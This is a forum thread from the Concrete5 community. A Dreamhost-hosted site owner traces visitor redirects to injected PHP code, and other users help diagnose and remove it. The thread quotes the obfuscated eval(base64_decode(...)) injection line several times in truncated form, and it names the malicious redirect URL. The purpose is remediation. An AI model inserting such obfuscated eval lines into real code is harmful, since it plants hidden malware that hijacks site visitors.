Visitor forwarded to commercial websites

Permalink
Hey Guys!

I'm new to Concrete5 and web design, so thanks for the help!

I was just informed that a visitor to our site (www.justifi.org) was forwarded sporadically to commercial sites from our domain as she was browsing. Is it possible that our website was compromised or hacked, or is this likely a virus on her end? Is there a way to check, how can I be sure that our site is not redirecting visitors to advertising sites, etc.

Thank you very much for the help, please feel free to direct contact me at Steve@justifi.org if you have input or recommendations, too.

Best regards,

Steve

 
adajad replied on at Permalink Reply
adajad
Most likely this is something on the client side and not on your site.

That being said, I read in the thread below that Dreamhost had an attack a while back so if you use Dreamhost you should investigate further:
http://www.concrete5.org/community/forums/customizing_c5/hackedinfe...

EDIT: I have gone to your site several times and not once been redirected.
Justifi replied on at Permalink Reply
Thank you very much for the quick reply, good to know, thank you. We do use dreamhost and I'll contact them about the problem, and check my computer for viruses.

If there is an "injection script" etc, then what would I do to resolve that? does Dreamhost take care of that, or do I need to do something?

Thanks, I know these are simple questions, really appreciate it.

Steve
adajad replied on at Permalink Best Answer Reply
adajad
Since Dreamhost is well aware of this issue, I think you should contact them and ask for how to find out if you are infected somehow. They should have a known fix to the issue IF it's in their environment. It might still be on the client side, though (since I didn't get redirected).
Justifi replied on at Permalink Reply
I'm actually now getting replies from other people, and found in a Wordpress forum something similar. it looks like people are forwarded to this address... What do we need to do about this?

http://ustreamtvonline.rr.nu/3f/...

Steve
adajad replied on at Permalink Reply
adajad
I would contact the hosting service immediately and also put some information up on your home page addressing this issue so all visitors are aware of it not being something done by you, but as being a problem with the hosting service.

I don't know if you can actually see if something has been added to your php files, but it is worth to have a look. Look for suspicious script tags. The discussion here is kind of informative and contains some pointers as to where to look and what you may find: http://webmasters.stackexchange.com/questions/26475/is-someone-hija...
Justifi replied on at Permalink Reply
Thank you, really, very helpful advice. We've posted a message and contacted dreamhost, they're looking at it and we hope to hear back soon. Thanks for the help, and I'll be happy to share what they say if it helps others.

looked online for ways to scan php code for viruses/injected scripts, but I think dreamhost is probably better equipped to handle this?

Steve
adajad replied on at Permalink Reply
adajad
Dreamhost should be able to come up with a qualified answer, and please do post back here if/when you resolve this so others being victims of the same can find information.
Justifi replied on at Permalink Reply
Still waiting from them, but I looked at a bunch of the PHP files and found a lot of code like this in my index, home, full, etc.php files.

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21................."));?><?php  
require('concrete/dispatcher.php');


I'm thinking this is the problem, yes?? I'll wait to see what DreamHost says, but I'll keep searching to figure this out.
adajad replied on at Permalink Reply
adajad
This is definitely the cause of your problem.
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21................."));?>


You need to remove that part from all your php files and also, when you have done that, change your admin password(s). You should also look in your 'users' table in the db to see if you have any users that shouldn't be there.

Also, look in the dispatcher.php and other php files usually included in pages.
Justifi replied on at Permalink Reply
This is great to know, thank you. Going to go through and delete the code.

Last question, I hope, is just how much of the code do I delete? This is the first few lines of the site, how much of this is malicious? (from the blog-index.php file)

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsg...CkuIlxuIi4nJDEnLCRkZWNvZGVkX2NvbnRlbnQpOyAgfWVsc2V7ICByZXR1cm4gJGRlY29kZWRfY29udGVudC5nbWxfNzc3KCk7ICB9ICB9ICBvYl9zdGFydCgnbXJvYmgnKTsgIH0gIH0="));?><?php  
defined('C5_EXECUTE') or die("Access Denied.");
?>
<div id="blog-index">
  <?php   
  $isFirst = true; //So first item in list can have a different css class (e.g. no top border)
  $excerptBlocks = ($controller->truncateSummaries ? 1 : null); //1 is the number of blocks to include in the excerpt
  $truncateChars = ($controller->truncateSummaries ? $controller->truncateChars : 0);
  foreach ($cArray as $cobj):


After this, I think I can swing it on my own.
adajad replied on at Permalink Reply
adajad
this is what you need to remove:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsg...CkuIlxuIi4nJDEnLCRkZWNvZGVkX2NvbnRlbnQpOyAgfWVsc2V7ICByZXR1cm4gJGRlY29kZWRfY29udGVudC5nbWxfNzc3KCk7ICB9ICB9ICBvYl9zdGFydCgnbXJvYmgnKTsgIH0gIH0="));?>


basically everything before
<?php   defined('C5_EXECUTE') or die("Access Denied."); ?>
AnnieZ replied on at Permalink Reply
OK - this is happening on my websites as well. Also Dreamhost. But I see this malicious code on almost every php page I have. I am not very savvy here. So do I have to open every php page and delete it? Is there a better way?

Thanks,
Annie
xaritas replied on at Permalink Reply
Yeah. One of my websites was just hit. They infected every single .php file in the site with that line of code.

Well, it was the one thing I did in Joomla! before I decided that platform was a joke, so no big loss, except my time.

I don't even use passwords, I use key based authentication, and they still pwned me. So obviously the attackers managed to root the machines and literally nothing is safe one your hosts. If you have sensitive data, nuke it.

Thanks to the fact that Concrete manages to avoid intermingling code, you can probably re-install concrete over the top of your existing installation and it will be good. However, it is a delicate operation, so take care if you are a novice.

Super excited right now.
xaritas replied on at Permalink Reply
Okay, I wrote up how to do this for every file in a separate post:

http://www.concrete5.org/community/forums/customizing_c5/if-your-dr...

You need to be comfortable with the shell. Let me know if you have any problems, I'll monitor that thread.
Justifi replied on at Permalink Reply
To be honest it looks like this is a little out of my league to address on my own, we're looking at commercial options for repairing it. I found Sucuri.net, which seemed reasonably priced and their representative said they could fix it for us. Does anyone have experience with this type of service, should we use them or is there another service we should use?
adajad replied on at Permalink Reply
adajad
I haven't tested xaritas approach (since I'm not on dreamhost and I'm not infected) but it looks legit to me. You could ask nicely and perhaps xaritas may help you. If not then I could give it a try with the information xaritas has given.

You should be aware that you need to give out root login credentials for your dreamhost account.
Justifi replied on at Permalink Reply
Hey everyone!

Thanks again for all the help - I wanted to let you know that we were able to resolve the problem by contacting DreamHost with an email specifying the problem and their Security team was able to go in and clean the problem, free of charge. Took a few days, but we ran diagnostic tests at Sucuri.net and unmaskparasites.com and both came up clean after this, so we believe the problem has been solved.

Additionally, we had previously been unable to edit concrete5 on our Mac, and realize that this is because we were hacked. So, now we're able to edit on the Mac, too, answered another mystery for us.

Hopefully this is the end of the problem (we've changed passwords, too). Any pointers for how to prevent this from happening in the future?

And, thanks again for the offers to help, really truly appreciate it.
adajad replied on at Permalink Reply
adajad
I'm glad you could sort it out!
peleus replied on at Permalink Reply
By the way Justifi, did the support remotely login here or were you just given instructions?